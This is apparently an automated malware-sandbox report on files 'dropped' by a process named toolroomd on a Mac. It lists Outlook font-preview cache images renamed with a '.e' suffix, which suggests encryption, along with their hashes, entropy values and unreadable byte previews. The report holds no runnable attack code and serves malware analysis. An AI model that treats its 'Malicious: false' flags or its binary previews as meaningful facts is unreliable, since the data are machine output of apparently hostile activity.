@..en.0.6Gn..f..U...:..K..~x...8$.........4".Q..I...?.K$..]....Z.!..].4.....x.#.7#4.......y..../..[E..?..\|&Wf....jc.Y..$...l...}Z.(W7.....:y>!....C.u...Af}V......~3,...Leu(...]I.1M.t.s.?.[tH....!......J$PQM..B.BO..F.....P.....Ye^.....b...NmMg..1.u........s#..._\....T.epp...F......6..qZl%...>.$A.)....7C......2.v..K.....v.S....f.P......\.=l..4..*.TY.(@.j.T%m.h.li..)....h.sx....4w.c.fZg,+....]`..\|@.,..r.+.N..."...C\t}...'..T..6;....0..<..=M.=.....&.._E.x.+6so.....B......~..~P..tX.$lw..t...oQ..+...]...=.Y9...Z..X.#..iC...:.?e...6.L....r.f_..B......E.....t....L...!7......\|q\..I...v.....'.7.39Q.&.t..sd..b...D/$.8u>.KW....Q&&;.i.^b..m\..;...@..........G..<L...m.2N..07\|.u.e.&O[.g..o..m>L..m....1(..j..B..f_c...FeRH..Z.#...&...G....m.......5"OH......m...\|...D..(......Z.g...qL....E......

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Kaku Gothic StdNW8.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2994
Entropy (8bit):	7.7904222916426455
Encrypted:	false
SSDEEP:	48:9pazsYMCqEPMQcVf/gq5u/VHYyP/OMKIL4sUMqYYhNdSgNpq:9+LMzBxVf/gq5CNYmx4s9CdSgu
MD5:	D718837553D1871DE5FC80BFC62D0C84
SHA1:	2C04C445D9318BE5234ACE5863502BBD19876740
SHA-256:	9EE5E08E4A646BC131A46BFAC52AB3C9899FAB9316A102E6338ADED56C6AC0EE
SHA-512:	DC0C125F05E431D1FC4D7C24266DAD486A9D6B1EF40C9C91F863EF27A51796ED03688905441BDD0B0D4D744F8D6A4C04D0968314880DBFB32C833B3101ABE422
Malicious:	false
Preview:	.<.\|.....f.A..}.r<.9.%...D.fu.;..bcZ..i .Y.a.B.<....z{....j.....t.../nD.....[t....+........I.a.6`..3..2.Ew&...[\.q9ck.....F...3..KsG..i..Gx.f.....h.\|.._......c..z......`..^.F.6/.L...z.3..C>[...d...G.K.5...6.`.{..qQR..e.r...:....t,...&.u.o.....&..5.\|'....BL....;>tW:vi.B..b^....ZC..`b."7V...:...h.. .U.....m...s!.(.8....uO.....#./....i.t..q.....s`.Z..9.5.Xs.V.f.".n'.0+~$.D.Q!.t.J.h..B.<.eO....]O.....an....?.k........;...~.X/..@..V..%?[.$.......;.".y...!.".......-...{..cX.Iy...G.@....<....f..l.<]....nN<..]=....ns.\\O){.0........$:..(F..Wm.h.2k..H3.9..F..R.v$:../.A.).Mi\|.[.......i.@.[.....%..gd..$w)...K....}WFG..a1CSz..e.. ....y7......q/.X.....H......J.....w.Ab. .p_Q.B@..r%.g.B..........u,.....vS.c..C...>.X.00.k..qF..!..k.G]e.....w...H.g@.b..5..s.t...!...D.<.<T...tj..~.;.!.v.....w...."..&........;..&y@r.}c k..g.;.$...;...rR...?#....).BV`.....c..({:....!.:7..{...w..E....w8.~...0..s.\.a.I}3....=[OFd...N.^.\.>......9qHJv%.h!W...R......t.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Kaku Gothic StdW8.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2818
Entropy (8bit):	7.772799972078469
Encrypted:	false
SSDEEP:	48:9IqZmXgVWFDJhXDIGip8X3fW8ZcnIZqJoWTCDKAJK4+SeRNpq:9IYmHpJlCyf1ZcIZElTCdx+3Ru
MD5:	A1F1AEC449B7A516EF560ED387E67680
SHA1:	B43812A18E846F61F0B2C3401E0F8FBC1EAD26CE
SHA-256:	7468E8BC629E0C23646909685E00C60C8F152ED4E2F6782CD0E6093F047FCC8B
SHA-512:	6B505083F44E40291F6D2407EC5D32EF548F7073449286D5D67FBD0725598CE6CA671DAB797BF53144D3DDE0EB134B65A587E434AD370DAF1C2C7D72CB76872E
Malicious:	false
Preview:	.<.\|.....f.A..}.r<.9.%...D.fu.;..bcZ..i .Y.aS..\|.h..UD5..,g....>.....x.._.....eep_.t.0l}..d..L.R.....$.rF..v....!.Ho5.2Dw...n....6..L..3..M..."k%.#X.ci.D.^.Y~.I......w%N.7.KX.i..!...)"!.....Y.HU.....K..S...U.r._...:.d{.....T._c.../.KAV..5.....[.@.....@4J..a...K?<..8.C.c...V.T.........p.M1W......i..@g^...J@....0z..u..e..,.....R..3x48.p.a.>..{-.UF]k......4y./>...[..X.?j.fUCu ..pi....R..qH...[...2.P..."..vn.........m^C......G..).............h.o>..@.3.q.......X..Fm@...9.l.EV....E.....G..b[U......._P. ......}..#!...U.F!....4....w.G....Zj(.0.u.2....QNV...4.rG....^.!....g........yPj.F.3.k..e._.oq...l."viMIo.G...~.(..~..f.3..6.!.....Y..Y'+.."Oi.BN..6#t.....L0Q..5..W...V......e)..... ..O..j....dk/..v[.2f.......................5yiz;...sT.~.<.M...YL....34..@~....Y..........QF8.IK.....VVa........z.c......e....'6...^..k..U.^...8...i-.!...op...ub...!..}.{.h...!.$.^#%....9....`.....Z...x.-.....s......d(.6W... .........n?.........B..R$..5.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Maru Gothic ProNW4.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2442
Entropy (8bit):	7.746293996874391
Encrypted:	false
SSDEEP:	48:EcupxwaZ4ZsdLypaUpmtWtYftamEqg4JycXjyCox1WkNpq:hup2pQUp2Wt+3ycXiQku
MD5:	A1744F4B1635EAA947A368D667ECA3C9
SHA1:	8FDC45480172873451DE51F94460524367BF135C
SHA-256:	2803184DDD88BAC325194AEB9F81FFDD11A82A3B2A7B6DE28AF90A41CB977ECC
SHA-512:	B1D68B96F69BB6B45BB37FE077B822EF8DF997CA8626F5F2B3E68F881D2F2833FDA70469982A6CEDF70FE5EB4DA7FB8BD5124DD3ECE37BCEF0D0626815FFC6F9
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.}9.z5......F.E..../...K..-I..\|..".u%.W.E%6`..w..5N.E.7..3?h....R+.r'<.i...s..;...I-F....\......Gw....)......py..0u..0......si.............E..Td.tJ...E..A.P...)..F+.'1.p0.v.z.y.......k.....Lt.R...9.u.%a.......t.....,UF..g..V9>A....].F..Z..e.I..4.~..:L=1lKV..Mt...?.^w..n...1......^..q..Q...G..........^.w}..J..<.W.[.H.@..M[...+.....U......~.h..?..,....v...f.^...$.s.?.>..(.......14h......z.u..s.uj.Y..L`.6...%..R.L.n.....y.y...H......c..f....!...c.r.q...h...j!.....a..."......S..B:..R.?.4.c..5..N.3K\^Y..<>.LC..=....l;kS3W.....n.8..R.M4!...2.ot.\|d.>I...d......fn..:.u.I.....+.V.\.....~..&.]....nrN.T.D.D(k.i...X.A,.<.\........'......!..\......6....\|.f..+P....".2.++.."I%G=Cr..(,..H.$ujsU4ZS&b.l.rc.`B..K....JZE...#}U.P}>..e...^.a.A.....w..=......B..1..}.}.j..%y..W..~.....J.W.<c.......3...G3s..3...4.".:....-'.F......(.....v..0!/dQ.-;3..w....;......XfWqB.V..........>.'...`.......p.Va{.\|..n..[_rw..(.......

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Maru Gothic ProW4.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2282
Entropy (8bit):	7.715091324287015
Encrypted:	false
SSDEEP:	48:EwTS8fC3l9YiYEs6Zpbcnt9y7awgVrjvj/mMWDD0e8W2Npq:zS8QlZs6ZZcnt9ka77j/mFQeWu
MD5:	C111AAE3F9EEEC1F48CCF348CE233F14
SHA1:	0A8A91834E5AE2548493064072F751D6E0BC10C0
SHA-256:	475C49949CC8ADE0E7E384C456BA651B0E4F22236F133C558E0F9DCDF4EF2AC2
SHA-512:	4148576B544E2FFAE989F8EC5B2C1A1956346DB00CC12ED9C68588BB71CFDA35B3203BB2FBDEE133489491A80BA2B75D632F8F7A34D2B0B381C438146A2058DC
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.=.y....D...z9j...8....7..S2 -z+..n...t.g/6.Y-!.^../.s8}....t....yb..=..(D.....M...!...]..F..FY.J&CWb..>}.%a..H....lf...T-a...j.>.Z..a.... .`.a...]~..%f......(......3j...U@\......4...;{07.XR....c._.{..=.._=...P.....y.Dx....[.....NU....0....M_......V.Q.E.O.i.+@..I..`.ZI.....,Kv.r..`...Z_.....pVl m..M.F.1.X..."3B..:..#..U... .....2..o.B.._Z.`. .I...[.'......yg..!..\|..3...T6^".cy W\|..nd.N.H\...[.T..:/...f...{.X..HU.........9`.j.3.o`..\|..f.B..#N......U.g..5....<7...f.L..8UpiQ...mY.....8.......3....&J..^~PkN.....G.H...4..l..c..F..(I.u.T.~.l..1.q.x...L.r.f..`z.%P'.....+...I...4l....Tx.G8.]....0...q.....3.&........P...-..{.{psAU.U}.p..Y.e.k.)...U...P..).9)=h......9.<..v........:..8...!h.}1o.2.x?..h....[...FR.....&q(.h....J......4..6..."..].f(..=".S.Q.......)X... z........3;...R...>..O.+.x....jc...F.X.....9.&>..@?.u.c..\.WtV... !.'.....t.yX:{..........-V...F.0..Q...n,I.$.Q.{N.g..Y

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Mincho ProNW3.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2218
Entropy (8bit):	7.6957642202990115
Encrypted:	false
SSDEEP:	48:Ep8lZH7rVJTM5WdqoD/ZvHhnoOw8xgt5+PiXi3WguhSu+kNpq:XTH7rVVdqoD/lBn5650iQuhSlku
MD5:	709B435C9CCC7886DF2BD2E16B039791
SHA1:	FD95CA6364B14AA6A1EE664B1926A61FA7C90271
SHA-256:	F7F0B022F8CB5A7B46FC2191643B2AB5FD18CC9CDF54E1EC9A526CF98D912194
SHA-512:	6C87F85484CDD5E70180990BB88DE9C9706D2DAE4C4D8E9A1DE417417EED2B672353D6D5A4EBE8F17EDCC3CC109456C63041D6B38C1F377FA9F48240A9E2AB74
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..V.5.\...BN`...J}..p..lx.g...Q.g.QW..O..V..30i4.lcZp....L.>.....\:TJ.n...)o...%.~}8..Pf..O]...Y.....!..6..=....6..=....6..=....A.!. .\.__.*X.i..W{.Ky.c...........:e^...D.2.N..n..2G[.a..U~;s......%:.<...-A...u.C.........X..Wu../.}...0%.....J.QH......\|.......Q..f....?V.Y....,..N.^....,.....Z.yY(....t.{x"..b..8,O]...}.....[..-w..B..+.P...Iv...1.t....}Y.a.m.e..F%.#..&m"..U=.~k.#..m.../...~..b.Y^[..(.8.#.b.F\|...&..<.Vt...]Y.`3....^(.N..,~".]I..\.8......%.=.. ....P.....j..H.....xTG2..@....k..........Q.Nt...t...h..Q...L.C.a.'....3~..:.9.k-.BD.4....]......(.wq0..g..A...`3.........F.^.-.Pl.J&.z.}..................$KNr%...1Es.(..w.s...J.".e)'%...#e.9.&...U.....9...x...^..-.....1F.6.SR..2o-.+.-..Wx....i.J.oMf.?.S.6.....`..;...0.0.Y~.c.n..H..]..:z._K.......+'BX..$.f+.pB2.z..L.......(.G4..J]h......i..mh...w..E.9-.R7._.<..s..f4..a;..F.....B....5.C........CXM,......8..._.o.O.L...Q..x"9..D.vb`.+...J...z."..d@...

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Mincho ProW3.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2098
Entropy (8bit):	7.670539754252183
Encrypted:	false
SSDEEP:	48:Eko2WBJhNdLlYhXh/DuKyQ8lVXIHh+xZUAv0sGDza9/Npq:L6VO//sQul4h+P7vtQaJu
MD5:	90C4E63F0A2A54C34586C985E03D811A
SHA1:	C55580AE673E6DB48955135A366D2AC623D4A3F7
SHA-256:	FAAEA15ECC29AD2FBB904D1BDB3ACE20A3D44BCE8F47EE76F91258328C61B50B
SHA-512:	A420A1FA3C3B455CD2D36A70602BD93E474D33813A28A0BD22018FD42737241D576A8927A46CEAD76555783B3152BD287E0520A0A6851A5FD562910417595B88
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a_\;.....&......B..0.[..b.t#:.l.......=..Sy...0..._b....9.&.D........5\|S.i;.V. 7X8.;4..q.........c........u.....u.....u.......1.h..az,..)LN..j.H.st.@H...P..............o;....d.0O...7.!..D...tp...7...wH...q.LS.g.#........$.T...j.[..-..1q..=7...0.$v}j~.Il....qr..........;o...._N.Y...Q.&..i..P.AO.6..Y.).[.V..."..uL;.%.(..wmh...kE..J...[.H..B......d.JL..i...;..%.we.V%.p......kw3.v.........(Z..M.c.y.u../.8....y0..2$_..SIu,..Z9.[c=,...1. @W'.c 0.....m..Bo%..z..m.sb.....P...".B...^...s.Y`O....\|.)....7,X...OF.f.2AJ.KDn..C.z....p.vm.h!...c..H.@O.......q[.V\|b..K.$/.B.Ep=.4.r..N%..S8........S..p%....]g..~M.....M"....x.2...........t.I..Z.6Q....(#...z..f..E.af..@..&.}....3.p.!@$.....R...).ZH....,.....0..4H.nB.`.......X.~"',Ng.........5.yU.}LW~..'$....}...VM....Aa.>.U.<9..AvbD...q.0....7.e...E.zcH......C.g.l..Qu6............v.Es.4.........*..bE..-.t,Y..."#.......I\.e.......D=z...&......p

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Sans GBW3.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1834
Entropy (8bit):	7.604153050273668
Encrypted:	false
SSDEEP:	48:EH5gG5APMjJakOQnBvA3zwvXs6d5kDNNNpq:C5APMdahWBv6cfs67yNu
MD5:	D277246CD298F34F70421F7988BDA66E
SHA1:	B6EF5CE111EC316668ACD695784D7DF51BC03BF5
SHA-256:	55604163A5E31024ED43E14917E420B6539621A13F17E10871C6BB3D385C8E5B
SHA-512:	C2D74CB0736507DADC17A215E9EF3B79A62798350367C22BDC5FF979EF47BBFDB75C174927C6C8938456546E44C5F2DFEA428ADFF5F4948A3B3C6B266398097C
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.al,..I\|Q.3Pq....\|..k.J..P.B....[fyZ6Z.{....U...~..?>!.JM....Q.5R>...0.Hf.4...h..5...._..!!HU....g..x...-.O...z4[.....z4[.....z4[..#c.:.2.j..h...].....}=h......L.....B.7.......k...\.."R.<dO.2.,/I.x..0.o.>....T..N.....T.....\. .b..'.E..J.6_d..T..H<.<s..R.5'>.....\|.GgIl.....J....TjA.....4.9... =...[.>_@.cxy....I"k.^.\|..6 ......QtfL>..H......I.@;b..'Ri%.91{....N.T:....y...J...W.k.H.....u..0...-.i.i..Q....;..8.?P.!........+Y......y..#u~.e.@hOv....:...&...p..I...@.z.:....N....4.?....{c.w.&......gT...."=..K.m&.b..I..%..[..{..;.....ls.b...hC4...}....A..\6...I..5..d.N....?..(..a.z....w.+.L..G.;.vZu.^..o.A...k..{..-2T..{9.....i..:.....&nt.KZ.....O.v...V.uR.....Zj...\|..?fi..=;.....OOj.i........U...!....=A.s.P:}Q..p......r.pv3..=..*.k..N.U...I:.n.P...,.\.E\.L;...8&8H....3LiW....D...V..l.<..\;....'..{."......y.!.B..L.z..b.Jo.}.E....yZ....6..8Q....r<.t.$.;...M..'.e.Afd!..<......L.."..w.L........3$$Jb6...ql...]Y.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino SansW4.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1714
Entropy (8bit):	7.57920034135677
Encrypted:	false
SSDEEP:	48:EPo3irLVBK7EuX06F8R0kkdeaDt8FWo/EO1r1Npq:b32LVIH0S8R0kkwaDi/E2hu
MD5:	1BC1874A1FF6B4925E5D19AFF8303E11
SHA1:	19B4C67D97689B236ECCD6FF9F49F92C876EA32A
SHA-256:	4531E04565829340384021871C42D1D4ACEE46944C268CACA9A89C27942AF131
SHA-512:	F99AD62E041118A9CA1917DD5993C664624613615E772986CE65F32DB17FDE80BD23B22098492AF93511EFFE555D39F0621E5ABE292633269341BF219EEAA47A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..n..#~R.[DF..,Q{..M.E..C...........U4..G\)..x~.w\|......}H..S.L}.......5...hp#...."H]......,0...ll...].av^.Q.r...S.....v..8i%S.m.....C..GG.2Qk...B.......9t....-....p..7...&.^&M,L..(.E............o7.r.W.j.. -.k.(..j.P.{..\g.>........4..l.p..\|H.p.;Y.P1.2....r.b.u......>i...5t.p...3.....h.}..L......\...2...)'M...@...L..fK..(..S..i.u...i."42y.~..jZ..U...4./...B...y.....SS]..d/....<......d..&.1.W..F[!.r9"^..=Eg.M.Pb...%....."q....X.\..5...p....p...F1,..._N.qU....O`..x$.<..q.._r..v.{...90...d..b(/g........oQ,..x....jM.f>B2...=.....r.. ..U?.....!>.J..GhR.....@....;{.B.....x...~.S..4P...\.=.]..\....xA/J./..M...0%.;k.^.....r.'...x.}S.0....@.+R.@..X;.\|...<.y.I.7......+....+.y..Q.<~.{+........&`&...S.hd...+.$.k...J..ZKS...L.....@..?....\|..P......kO}.. )....T.g.i.cP....i.5.,..3...}..br/.fFd....!A)78X....2.X.....X.D.r..Z..b..\.S.g.\|..Z..Zu..,...P..:.>..j.7..Vu-...5o....N..I....6vH.0.:.....>

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hoefler TextRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1522
Entropy (8bit):	7.512413648011954
Encrypted:	false
SSDEEP:	24:E/2HZywVoCz4MZZYfS4GszaEaMdFinpj6fa6DQpsqjWhoPe/xrR0QUsePc0m7:EIIM8f/VanMdMnx6ffAXjWhae/tR0JNw
MD5:	2C902067872C5326B1D52D592CFCE703
SHA1:	3A670CC9A6F0E663AE927ABDC78FDBBDB24F612E
SHA-256:	6E78A8F5F5F52DF9F8C22B7770BD1661DFF5345E8BCB144CF025183643B69FD5
SHA-512:	2E3C3BDA747E7E0B1E9D4C6CD29DF32FBC0C11C7F562FCAA561F2239C0D517A4D802AD26404EDAD57D8C0A33B5BA8663D2C9A7C69C1B279C3DE33C00FD3CB3DB
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a....C........R&C.F.1.D$L..Z...Y.t.......W..o.nC.B`. ..m/...I......-.....d..7:....p<Q...$^Y.T...}.8...=..>.A..2W..b35.?.-.S.Z.m.`....\|...e..I....r....).Adl!L.B-..P...r.......g....C.o^r..7/-dns..&.x....zc...aiSH......5..<.S.<....<_N..+.\|wf.1W1..B...,..VJ..l......V......\.g.p.2dhB..?..:k.....3Z...jpRG.c....6/:J._jr.k..+.k....0.........C...>.a.<a.e....>8....&+..._..8rZ.s.,h.s..^.'t.4....7}...Y+.K..j......n_..i!.!........,<.5.^........R....X..YM`!9.bY..ix..Q.J.V...H...%!.{.pP.2e.H..b..{0.)".i...B...n..}]...J.,.b...k[.".K...;..K..e.He.TD....t..v...B....'.8.`w.O......(..$....$@..W.-..M.X..YD..i.!..K....?.N.....\|.4h...I...~.R?....+..G........It...).-$.&..[..ko.z.5..&.f.w..t.........Z......#v.......>.8...(.8..{...c.F..=..7.&T9.8...c~a"..y.$...,..TDgA.f....\|.&.P.....9.>.^...k."i..\|H..2-.........m.).E.........B.....V.8....z.s..Rk... pK...V.._...".e..~..?..oq....R<.<SDKz.A.%1=..f..2/..=S...

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ITF Devanagari MarathiBook.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1970
Entropy (8bit):	7.671321766242825
Encrypted:	false
SSDEEP:	48:E7rDqSDHBlqErqNsJHIx2JrRteYdUfjYhN1DTNNpq:umSjbwyH68rfeYdUfjYhn/Nu
MD5:	035C3605D18F49CFD9C1748BCB29FB9B
SHA1:	A709CFD8C8BFEB6F1AC755AF4176C19C094F5CC3
SHA-256:	C6CCB8189B1DB47A3FD65DB93F57659673533ED28F78C7328B0FF58E73261DA0
SHA-512:	E2E0B41A9793407CFF7CA6DF6F6D1E4A3FFC769A0E393FA6F1E5D0CD090BA1DC5144800734A6BFED2F4DDA6DC15DB9F466C3D1D7822CCA8405747FC79FA84A2F
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.afP...R.&..........LmW. .J..c....h0Q....=.Y....4@z._3....ao!.#I"dit.`_....zO.U......'.k:....t.l....9.{.........9...B.h.kt..B.h.kt..0d..,.....H....4..K.C...8x.s4..O..1Wa.:...(..\...N.".^t..-..H...8...2...h;........nQ.:......I.........._..lsat..&...z%j.K..8=...h.VH.f:..._wd...K...!.{3\YQ.n..........lz...v.#L.n..kd.\|3"R.2'Z..Y`.........D..!.7......v...6.>..;.mX_cZ.4=oM=.'d..V..~u.&.h"..V.`.......E,......X..0.nx$Nh.lSS2.5O.(/.s...&...!..K..a.s.5.[.EP.$.F....S#.UII..@.uDt<.G........ ...n<...~..y.'.+..<.........P.vf..n.8+{- ..n.`...J....@..9Bjt....LqMq..(%.3.[.o..cN.....w.b.o.C._7........dY.._..e.Pj.k6.?.0uo..i....q...!.#..\....b?.....*4..}...~<....."...z..^Zr.=..?.Z.XU.VI...h.d....1.M..t...9.gIc.S.Y..^l.iw.'^.:...P.R.....,A.......1..W.....L.... ....)...^..b..7..MJE...v....#}.7.L......-....5......P......l........JM....z2..rm....y........QJ.;.........t.p.^3.>tT.M..q.....j..E..7v8.x..y..%.....:...H...

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ITF DevanagariBook.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1522
Entropy (8bit):	7.513417383265788
Encrypted:	false
SSDEEP:	24:ElCRgKREPnsqXCMk0Z8xIGazHQ22SAKuYfBucoqerI8U6KKeBMhjIzsePc0m7:EligKREjk0KOGazJ2SYYfYcorrI8ULzg
MD5:	761B1B1700F8CC972E5F7A2AED23EC43
SHA1:	24BBFFC05751BE6F7EE61F69EA48675CBA937841
SHA-256:	6C51F4870C82599E3351A29C7C7267DD9B95D99B38FEB0F1E11F97F6A8FDAF2E
SHA-512:	01144B78CD07C4979AAAC5652E94E6DA77222CD98C1FF6C9EE9C11126F16C76E961D506F6A542A7A352A2C52F94546A5236858E1C0FF4AD54035FD3CE0D3346B
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a....C...T..Z....rP.!..'....{.Rt.;.....w.C..8....~u..9.o.....p."..u..i..]Y..,......e v.}.....j~S..Vl.C..i.6\|.8.Q'\|aU......[F~...&.....X....@1..T...U..k.nh.<+.{i.....A.h4#z.LN.d.7.A.....~.......J..of.../......BgB.0.'...9..Tbg.DM..I.P.j=..7\.8,W..>.uB......]..6.h.U....G_....%./.Y..@.`......Nb..e=)..T...."....b.j....?.v$k3. .....BO{.....2..{3.]j.].._.q..q..8...-......0...;....'6.'.........;..,.w>.d.l....$.x#......m..R.w........9...Y...n..{...wj..ku.......v.....lmh.v..0..Q..9.D..^............X..wXCl.G...#.W:..=.8jC%2.A.a..g.....{.h.p.<<.\|o-%.......v.Cw..++.a.TM.f..r.)..=.t}..B<...m6.....X...F(.................,8R.....<t..?..7..&P....&......a.~.....Y..*6......J.......L.....Q..%..7.."(Q... ..IO...I..L.Cu..../%.f..d5!."..q..g#yA...p..B..>.>j.Rx Cu0..q.ct.#.B.....Q..0...K.u8\.....X...^$1...x..d...t....%.G.m(5.P..t.m.I..HBd(I\..yg.w)7..q.p....I.p........e.....#...X.....8G..Z.8.E.Y&.....N.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ImpactRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	7.193409537637735
Encrypted:	false
SSDEEP:	24:EJsyt2DubVerl8AKi9D0uY3JwYoy6c8GsePc0m7:EJS5IN3yxc8GNpq
MD5:	283B3221C5E2AA3DEB90372B7B53136E
SHA1:	EB0B0181E4B1FB67D5EE18548D69F46106AEB050
SHA-256:	3A61AC746A856C219819EE6267DCA73F49F511D8C799E752D5EA08999D0131A3
SHA-512:	2F51348A56CDE0857330DF22E1DF3F4211664C88686B9F07DC9BFD87BBD422BD66B64564AAC48B93B8FC685A3ECD15A00F4BA99BEE6F12C0066B31B922A9B10C
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aS.,A.7g:...[.u.H.......E....(.y..H...!.=67..G...=..W.c.@[2g#.=W.H...u.h.....Y.eH...8...;.q8.......P~#2R-.-5"s..}m...[g.....P8...L..Fn?S.H~.....W608E..Q....s.1h.N......s.h..F..-..%..i..V.ClZ.M...Z....[`...[#a.x....;.......h:p..&. .u.._Nk`.....^.yx..G.da.m.=..a3..'q.\|....S&P.'H.........5.w..s4"m.......Y..x..u....PJ...K.'"..v...c..w.M.%....E..3/Re....r.h.(.[9.6......M....NBX...b.^.X.%.c..tBl....4^.s...ZO.3.T.%...w.R...m.x.v..............KJ.K.... ..).W.9...\|.K......%...[P..........r6..v6....L...Y...f.03.(q...qJ...PM.,..Qf..Y..H...+......Y.h... yv.......jt........t..V.u...Uv.PEq.....F.~B..r-\|......p.).s.-.".1...H..'.;.-.....Kf.V.4..oF.U.!..V.m3.i.3....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.InaiMathiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1226
Entropy (8bit):	7.37517780509557
Encrypted:	false
SSDEEP:	24:Epc1mrAe/lB+2IiVM1vZIdjR0yMy0+Iut5sePc0m7:EO1mPB+bi+5qMyMyHvNpq
MD5:	951AEA44A82D1812BE7BDCA24079D440
SHA1:	225164DD670F8B3550CD733B310C8474292A2AD2
SHA-256:	843335C0A1CA634632C9CAC2489D7B14ED2E397D0B1AB155D54ABCA0630C7915
SHA-512:	11B3B7D4D2B988F4CB725A121DFA91033718F2A7EA95CF08B9D6C162B0F1E75B42BA8CDB99D1DE9D73578FC6F254D44EE9A9A46BD22CD6D45BBF230411B20C3E
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.U.}...vU@G.e.......yS.....x.`,:/o...y...E~.0..yU.N}+].`Tp..V6.....C.C.Mc.:9Qw....>FE.m....2Wy.r?.cF.............Z...R.n.CW'.........,..AU......$H..[.6.....h.A.`N`..IbJ.O.xL7.(G....0.Wq.}...'....."..hv.=F.1...........3..'.B.@4..-..8...W&.......y..(l..3.)....xq...S..%....(..!....5...0.=)O%..:.t.6t..I.Q...?.4.F.<g.....\|0...@.....N}......g.E.S.#8....Z..r..A..U..f.....&..>.D.rH..{.....p<TL.....Y.s.H.C.. K..Cn0.r.D..!uP_O.....V.H.f.\.E.<.(.Z.e.I........:........E~..._.#..#...5,4E..W..O.O....(..j.1.U.t)j..z%X.. .ah..m.....Nl....}.@<N.E9.ia....,.o..md...8..!.....w=.2...a..t...c..._...R..0Z5.q..!.l,..n...v..[".kj.L.h..j..o....-K?....!........P..m...,.,..p......ft.{./..%..[...^.;...!<m}.K.s..~^.k..7...4m.b.. ..!Z.Xj.M9..X...b..m........n.{.I..N.iz...i.<.......e/.....<.mUc.../................0l.+..Z^.....`.A++%..?..&.F......................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Iowan Old StyleRoman.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2034
Entropy (8bit):	7.671977185683256
Encrypted:	false
SSDEEP:	48:E/Y9o5y344q/ZYm3rgZVyswfGVVA2v8Npq:6co5oA/6m3QwfGVVAnu
MD5:	059630E6B948C9287E5D99DDDC2F08D1
SHA1:	C4C336965AB3BF7F31C7D99FA18CB0692119B742
SHA-256:	8D212B9C54A31058F64B67449AB4410D672702959CAC4F9D07D1A4617011DAA6
SHA-512:	7958A686705A0E539D3D0BF093C6DEC8CED8C1DD56E01074C9174F5887CC44824EEE164811F5A7C5B487090C6A1A7CF735A6E1476AF45500AA54966E9DF4F1C1
Malicious:	false
